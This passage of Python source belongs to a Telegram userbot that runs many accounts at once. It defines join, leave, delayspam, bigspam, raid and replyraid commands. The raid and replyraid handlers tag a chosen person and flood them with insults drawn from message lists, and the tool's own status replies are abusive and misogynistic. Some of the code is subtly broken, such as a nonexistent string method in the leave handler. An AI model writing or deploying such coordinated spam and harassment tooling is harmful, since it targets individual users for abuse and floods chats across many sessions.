𝗝𝗼𝗶𝗻\n\nCommand:\n\n.pjoin <Private Channel or Group's access hash>\n\nExample :\nLink = https://t.me/joinchat/HGYs1wvsPUplMmM1\n\n.pjoin HGYs1wvsPUplMmM1"<br/> if e.sender_id in SMEX_USERS:<br/> yukki = ("".join(e.text.split(maxsplit=1)[1:])).split(" ", 1)<br/> if len(e.text) > 7:<br/> bc = yukki[0]<br/> text = "Joining...."<br/> event = await e.reply(text, parse_mode=None, link_preview=None )<br/> try:<br/> await e.client(ImportChatInviteRequest(bc))<br/> await event.edit("Succesfully Joined")<br/> except Exception as e:<br/> await event.edit(str(e)) <br/> else:<br/> await e.reply(usage, parse_mode=None, link_preview=None )<br/> <br/> <br/>@idk.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@ydk.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@wdk.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@hdk.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@sdk.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@adk.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@bdk.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@cdk.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@edk.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@ddk.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@vkk.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@kkk.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@lkk.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@mkk.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@sid.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@shy.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@aan.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@ake.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@eel.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@khu.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@shi.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@yaa.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@dav.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@raj.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@put.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@eag.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@gle.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@wal.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@aaa.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<br/>@boy.on(events.NewMessage(incoming=True, pattern=r"\*leave"))<div></div><br/>async def _(e):<br/> usage = "𝗠𝗼𝗱𝘂𝗹𝗲 𝗡𝗮𝗺𝗲 = 𝗟𝗲𝗮𝘃𝗲\n\nCommand:\n\n.leave <Channel or Chat ID>"<br/> if e.sender_id in SMEX_USERS:<br/> yukki = ("".leave(e.text.split(maxsplit=1)[1:])).split(" ", 1)<br/> if len(e.text) > 7:<br/> bc = yukki[0]<br/> bc = int(bc)<br/> text = "𝐎𝐊 𝐅𝐈𝐍𝐄 𝐌𝐀𝐍 𝐀𝐑𝐊𝐇𝐀𝐌𝐱𝐆𝐎𝐃 𝐁𝐎𝐓 𝐋𝐄𝐀𝐕𝐈𝐍𝐆....."<br/> event = await e.reply(text, parse_mode=None, link_preview=None )<br/> try:<br/> await event.client(LeaveChannelRequest(bc))<br/> await event.edit("Succesfully Left")<br/> except Exception as e:<br/> await event.edit(str(e)) <br/> else:<br/> await e.reply(usage, parse_mode=None, link_preview=None )<br/> <br/> <div></div>@idk.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@ydk.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@wdk.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@hdk.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@sdk.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@adk.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@bdk.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@cdk.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@edk.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@ddk.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@vkk.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@kkk.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@lkk.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@mkk.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@sid.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@shy.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@aan.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@ake.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@eel.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@khu.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@shi.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@yaa.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@dav.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@raj.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@put.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@eag.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@gle.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@wal.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@aaa.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<br/>@boy.on(events.NewMessage(incoming=True, pattern=r"\*delayspam"))<div></div><br/>async def spam(e):<br/> usage = "𝗠𝗼𝗱𝘂𝗹𝗲 𝗡𝗮𝗺𝗲 = 𝗗𝗲𝗹𝗮𝘆𝗦𝗽𝗮𝗺\n\nCommand:\n\n.delayspam <sleep time> <count> <message to spam>\n\n.delayspam <sleep time> <count> <reply to a message>\n\nCount and Sleeptime must be a integer."<br/> if e.sender_id in SMEX_USERS:<br/> if e.text[0].isalpha() and e.text[0] in ("/", "#", "@", "!"):<br/> return await e.reply(usage, parse_mode=None, link_preview=None )<br/> smex = await e.get_reply_message()<br/> yukki = "".join(e.text.split(maxsplit=1)[1:]).split(" ", 2)<br/> yukkisexy = yukki[1:]<br/> if len(yukkisexy) == 2:<br/> message = str(yukkisexy[1])<br/> counter = int(yukkisexy[0])<br/> sleeptime = float(yukki[0])<br/> for _ in range(counter):<br/> async with e.client.action(e.chat_id, "typing"):<br/> if e.reply_to_msg_id:<br/> await smex.reply(message)<br/> else:<br/> await e.client.send_message(e.chat_id, message)<br/> await asyncio.sleep(sleeptime)<br/> elif e.reply_to_msg_id and smex.media: <br/> counter = int(yukkisexy[0])<br/> sleeptime = float(yukki[0])<br/> for _ in range(counter):<br/> async with e.client.action(e.chat_id, "document"):<br/> smex = await e.client.send_file(e.chat_id, smex, caption=smex.text)<br/> await gifspam(e, smex) <br/> await asyncio.sleep(sleeptime)<br/> elif e.reply_to_msg_id and smex.text:<br/> message = smex.text<br/> counter = int(yukkisexy[0])<br/> sleeptime = float(yukki[0])<br/> for _ in range(counter):<br/> async with e.client.action(e.chat_id, "typing"):<br/> await e.client.send_message(e.chat_id, message)<br/> await asyncio.sleep(sleeptime)<br/> else:<br/> await e.reply(usage, parse_mode=None, link_preview=None )<div></div><br/>@idk.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@ydk.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@wdk.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@hdk.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@sdk.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@adk.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@bdk.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@cdk.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@edk.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@ddk.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@vkk.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@kkk.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@lkk.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@mkk.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@sid.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@shy.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@aan.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@ake.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@eel.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@khu.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@shi.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@yaa.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@dav.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@raj.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@put.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@eag.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@gle.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@wal.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@aaa.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<br/>@boy.on(events.NewMessage(incoming=True, pattern=r"\*bigspam"))<div></div><br/>async def spam(e):<br/> usage = "𝗠𝗼𝗱𝘂𝗹𝗲 𝗡𝗮𝗺𝗲 = 𝗕𝗶𝗴𝗦𝗽𝗮𝗺\n\nCommand:\n\n.bigspam <count> <message to spam>\n\n.bigspam <count> <reply to a message>\n\nCount must be a integer."<br/> if e.sender_id in SMEX_USERS:<br/> if e.text[0].isalpha() and e.text[0] in ("/", "#", "@", "!"):<br/> return await e.reply(usage, parse_mode=None, link_preview=None )<br/> yukki = ("".join(e.text.split(maxsplit=1)[1:])).split(" ", 1)<br/> smex = await e.get_reply_message()<br/> if len(yukki) == 2:<br/> message = str(yukki[1])<br/> counter = int(yukki[0])<br/> for _ in range(counter):<br/> async with e.client.action(e.chat_id, "typing"):<br/> if e.reply_to_msg_id:<br/> await smex.reply(message)<br/> else:<br/> await e.client.send_message(e.chat_id, message)<br/> await asyncio.sleep(0.1)<br/> elif e.reply_to_msg_id and smex.media: <br/> counter = int(yukki[0])<br/> for _ in range(counter):<br/> async with e.client.action(e.chat_id, "document"):<br/> smex = await e.client.send_file(e.chat_id, smex, caption=smex.text)<br/> await gifspam(e, smex) <br/> await asyncio.sleep(0.1) <br/> elif e.reply_to_msg_id and smex.text:<br/> message = smex.text<br/> counter = int(yukki[0])<br/> for _ in range(counter):<br/> async with e.client.action(e.chat_id, "typing"):<br/> await e.client.send_message(e.chat_id, message)<br/> await asyncio.sleep(0.3)<br/> else:<br/> await e.reply(usage, parse_mode=None, link_preview=None )<div></div><br/>@idk.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@ydk.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@wdk.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@hdk.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@sdk.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@adk.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@bdk.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@cdk.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@edk.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@ddk.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@vkk.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@kkk.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@lkk.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@mkk.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@sid.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@shy.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@aan.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@ake.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@eel.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@khu.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@shi.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@yaa.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@dav.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@raj.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@put.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@eag.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@gle.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@wal.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@aaa.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>@boy.on(events.NewMessage(incoming=True, pattern=r"\*raid"))<br/>async def spam(e):<br/> usage = "𝗠𝗼𝗱𝘂𝗹𝗲 𝗡𝗮𝗺𝗲 = 𝗥𝗮𝗶𝗱\n\nCommand:\n\n.raid <count> <Username of User>\n\n.raid <count> <reply to a User>\n\nCount must be a integer."<br/> if e.sender_id in SMEX_USERS:<br/> if e.text[0].isalpha() and e.text[0] in ("/", "#", "@", "!"):<br/> return await e.reply(usage, parse_mode=None, link_preview=None )<br/> yukki = ("".join(e.text.split(maxsplit=1)[1:])).split(" ", 1)<br/> smex = await e.get_reply_message()<br/> if len(yukki) == 2:<br/> message = str(yukki[1])<br/> print(message)<br/> a = await e.client.get_entity(message)<br/> g = a.id<br/> c = a.first_name<br/> username = f"[{c}](tg://user?id={g})"<br/> counter = int(yukki[0])<br/> for _ in range(counter):<br/> reply = random.choice(RAID)<br/> caption = f"{username} {reply}"<br/> async with e.client.action(e.chat_id, "typing"):<br/> await e.client.send_message(e.chat_id, caption)<br/> await asyncio.sleep(0.3)<br/> elif e.reply_to_msg_id: <br/> a = await e.get_reply_message()<br/> b = await e.client.get_entity(a.sender_id)<br/> g = b.id<br/> c = b.first_name<br/> counter = int(yukki[0])<br/> username = f"[{c}](tg://user?id={g})"<br/> for _ in range(counter):<br/> reply = random.choice(RAID)<br/> caption = f"{username} {reply}"<br/> async with e.client.action(e.chat_id, "typing"):<br/> await e.client.send_message(e.chat_id, caption)<br/> await asyncio.sleep(0.3)<br/> else:<br/> await e.reply(usage, parse_mode=None, link_preview=None )<div></div><div></div>@idk.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@ydk.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@wdk.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@hdk.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@sdk.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@adk.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@bdk.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@cdk.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@edk.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@ddk.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@vkk.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@kkk.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@lkk.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@mkk.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@sid.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@shy.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@aan.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@ake.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@eel.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@khu.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@shi.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@yaa.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@dav.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@raj.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@put.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@eag.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@gle.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@wal.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@aaa.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>@boy.on(events.NewMessage(incoming=True, pattern=r"\*repo"))<br/>async def spam(e):<br/> usage = "𝗠𝗼𝗱𝘂𝗹𝗲 𝗡𝗮𝗺𝗲 = eagle\n\nCommand:\n\n.eagle <count> <Username of User>\n\n.eagle <count> <reply to a User>\n\nCount must be a integer."<br/> if e.sender_id in SMEX_USERS:<br/> if e.text[0].isalpha() and e.text[0] in ("/", "#", "@", "!"):<br/> return await e.reply(usage, parse_mode=None, link_preview=None )<br/> yukki = ("".join(e.text.split(maxsplit=1)[1:])).split(" ", 1)<br/> smex = await e.get_reply_message()<br/> if len(yukki) == 2:<br/> message = str(yukki[1])<br/> print(message)<br/> a = await e.client.get_entity(message)<br/> g = a.id<br/> c = a.first_name<br/> username = f"[{c}](tg://user?id={g})"<br/> counter = int(yukki[0])<br/> for _ in range(counter):<br/> reply = random.choice(EAGLE)<br/> caption = f"{username} {reply}"<br/> async with e.client.action(e.chat_id, "typing"):<br/> await e.client.send_message(e.chat_id, caption)<br/> await asyncio.sleep(0.2)<br/> elif e.reply_to_msg_id: <br/> a = await e.get_reply_message()<br/> b = await e.client.get_entity(a.sender_id)<br/> g = b.id<br/> c = b.first_name<br/> counter = int(yukki[0])<br/> username = f"[{c}](tg://user?id={g})"<br/> for _ in range(counter):<br/> reply = random.choice(EAGLE)<br/> caption = f"{username} {reply}"<br/> async with e.client.action(e.chat_id, "typing"):<br/> await e.client.send_message(e.chat_id, caption)<br/> await asyncio.sleep(0.2)<br/> else:<br/> await e.reply(usage, parse_mode=None, link_preview=None )<div></div><div></div><br/>@idk.on(events.NewMessage(incoming=True))<br/>@ydk.on(events.NewMessage(incoming=True))<br/>@wdk.on(events.NewMessage(incoming=True))<br/>@hdk.on(events.NewMessage(incoming=True))<br/>@sdk.on(events.NewMessage(incoming=True))<br/>@adk.on(events.NewMessage(incoming=True))<br/>@bdk.on(events.NewMessage(incoming=True))<br/>@cdk.on(events.NewMessage(incoming=True))<br/>@edk.on(events.NewMessage(incoming=True))<br/>@ddk.on(events.NewMessage(incoming=True))<br/>@vkk.on(events.NewMessage(incoming=True))<br/>@kkk.on(events.NewMessage(incoming=True))<br/>@lkk.on(events.NewMessage(incoming=True))<br/>@mkk.on(events.NewMessage(incoming=True))<br/>@sid.on(events.NewMessage(incoming=True))<br/>@shy.on(events.NewMessage(incoming=True))<br/>@aan.on(events.NewMessage(incoming=True))<br/>@ake.on(events.NewMessage(incoming=True))<br/>@eel.on(events.NewMessage(incoming=True))<br/>@khu.on(events.NewMessage(incoming=True))<br/>@shi.on(events.NewMessage(incoming=True))<br/>@yaa.on(events.NewMessage(incoming=True))<br/>@dav.on(events.NewMessage(incoming=True))<br/>@raj.on(events.NewMessage(incoming=True))<br/>@put.on(events.NewMessage(incoming=True))<br/>@eag.on(events.NewMessage(incoming=True))<br/>@gle.on(events.NewMessage(incoming=True))<br/>@wal.on(events.NewMessage(incoming=True))<br/>@aaa.on(events.NewMessage(incoming=True))<br/>@boy.on(events.NewMessage(incoming=True))<div></div><br/>async def _(event):<br/> global que<br/> queue = que.get(event.sender_id)<br/> if not queue:<br/> return<br/> async with event.client.action(event.chat_id, "typing"):<br/> await asyncio.sleep(0.2)<br/> async with event.client.action(event.chat_id, "typing"):<br/> await event.client.send_message(<br/> entity=event.chat_id,<br/> message="""{}""".format(random.choice(RRAID)),<br/> reply_to=event.message.id,<br/> ) <br/> <br/> <br/>@idk.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@ydk.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@wdk.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@hdk.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@sdk.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@adk.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@bdk.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@cdk.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@edk.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@ddk.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@vkk.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@kkk.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@lkk.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@mkk.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@sid.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@shy.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@aan.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@ake.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@eel.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@khu.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@shi.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@yaa.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@dav.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@raj.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@put.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@eag.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@gle.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@wal.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@aaa.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<br/>@boy.on(events.NewMessage(incoming=True, pattern=r"\*replyraid"))<div></div><div></div>async def _(e):<br/> global que<br/> usage = "𝗠𝗼𝗱𝘂𝗹𝗲 𝗡𝗮𝗺𝗲 = 𝗥𝗲𝗽𝗹𝘆𝗥𝗮𝗶𝗱\n\nCommand:\n\n.replyraid <Username of User>\n\n.replyraid <reply to a User>"<br/> if e.sender_id in SMEX_USERS:<br/> if e.text[0].isalpha() and e.text[0] in ("/", "#", "@", "!"):<br/> return await e.reply(usage, parse_mode=None, link_preview=None )<br/> yukki = ("".join(e.text.split(maxsplit=1)[1:])).split(" ", 1)<br/> smex = await e.get_reply_message()<br/> if len(e.text) > 11:<br/> message = str(yukki[0])<br/> a = await e.client.get_entity(message)<br/> g = a.id<br/> que[g] = []<br/> qeue = que.get(g)<br/> appendable = [g]<br/> qeue.append(appendable)<br/> text = "OK SIR WE WILL FUCK THIS BITCH YOU ENJOY THE SHOW..."<br/> await e.reply(text, parse_mode=None, link_preview=None )<br/> elif e.reply_to_msg_id: <br/> a = await e.get_reply_message()<br/> b = await e.client.get_entity(a.sender_id)<br/> g = b.id<br/> que[g] = []<br/> qeue = que.get(g)<br/> appendable = [g]<br/> qeue.append(appendable)<br/> text = "OK SIR WE WILL FUCK THIS BITCH YOU ENJOY THE SHOW..."<br/> await e.reply(text, parse_mode=None, link_preview=None )<br/> else:<br/> await e.reply(usage, parse_mode=None, link_preview=None )<div></div> <br/>@idk.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@ydk.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@wdk.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@hdk.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@sdk.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@adk.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@bdk.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@cdk.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@edk.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@ddk.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@vkk.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@kkk.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@lkk.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@mkk.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@sid.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@shy.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@aan.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@ake.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@eel.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@khu.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@shi.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@yaa.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@dav.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@raj.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@put.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@eag.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@gle.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@wal.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@aaa.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<br/>@boy.on(events.NewMessage(incoming=True, pattern=r"\*dreplyraid"))<div></div><br/>async def _(e):<br/> global que<br/> usage = "𝗠𝗼𝗱𝘂𝗹𝗲 𝗡𝗮𝗺𝗲 = 𝗗𝗲𝗮𝗰𝘁𝗶𝘃𝗮𝘁𝗲 𝗥𝗲𝗽𝗹𝘆𝗥𝗮𝗶𝗱\n\nCommand:\n\n.dreplyraid <Username of User>\n\n.dreplyraid <reply to a User>"<br/> if e.sender_id in SMEX_USERS:<br/> if e.text[0].isalpha() and e.text[0] in ("/", "#", "@", "!"):<br/> return await e.reply(usage, parse_mode=None, link_preview=None )<br/> yukki = ("".join(e.text.split(maxsplit=1)[1:])).split(" ", 1)<br/> smex = await e.get_reply_message()<br/> if len(e.text) > 12:<br/> message = str(yukki[0])<br/> a = await e.client.get_entity(message)<br/> g = a.id<br/> try:<br/> queue = que.get(g)<br/> queue.pop(0)<br/> except Exception as f:<br/> pass<br/> text = "OK MAN WE WILL STOP NOW KALP GAYA HAI BECHARA..."<br/> await e.reply(text, parse_mode=None, link_preview=None )<br/> elif e.reply_to_msg_id: <br/> a = await e.get_reply_message()<br/> b = await e.client.get_entity(a.sender_id)<br/> g = b.id<br/> try:<br/> queue = que.get(g)<br/> queue.pop(0)<br/> except Exception as f:<br/> pass<br/> text = "OK MAN WE WILL STOP NOW KALP GAYA HAI BECHARA..."<br/> await e.reply(text, parse_mode=None, link_preview=None )<br/> else:<br/> await e.reply(usage, parse_mode=None, link_preview=None )<br/> <div></div><div></div><div></div><div></div>async def get_chatinfo(event):<br/> chat = event.pattern_match.group(1)<br/> chat_info = None<br/> if chat:<br/> try:<br/> chat = int(chat)<br/> except ValueError:<br/> pass<br/> if not chat:<br/> if event.reply_to_msg_id:<br/> replied_msg = await event.get_reply_message()<br/> if replied_msg.fwd_from and replied_msg.fwd_from.channel_id is not None:<br/> chat = replied_msg.fwd_from.channel_id<br/> else:<br/> chat = event.chat_id<br/> try:<br/> chat_info = await event.client(GetFullChatRequest(chat))<br/> except:<br/> try:<br/> chat_info = await event.client(GetFullChannelRequest(chat))<br/> except ChannelInvalidError:<br/> await event.reply("`Invalid channel/group`")<br/> return None<br/> except ChannelPrivateError:<br/> await event.reply(<br/> "`This is a private channel/group or I am banned from there`"<br/> )<br/> return None<br/> except ChannelPublicGroupNaError:<br/> await event.reply("`Channel or supergroup doesn't exist`")<br/> return None<br/> except (TypeError, ValueError):<br/> await event.reply("`Invalid channel/group`")<br/> return None<br/> return chat_info<div></div><br/>def user_full_name(user):<br/> names = [user.first_name, user.last_name]<br/> names = [i for i in list(names) if i]<br/> full_name = " ".join(names)<br/> return full_name<div></div><br/>@idk.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@ydk.on(events.NewMessage(incoming=True, pattern=r"\*add"))<br/>@wdk.on(events.NewMessage(incoming=True, 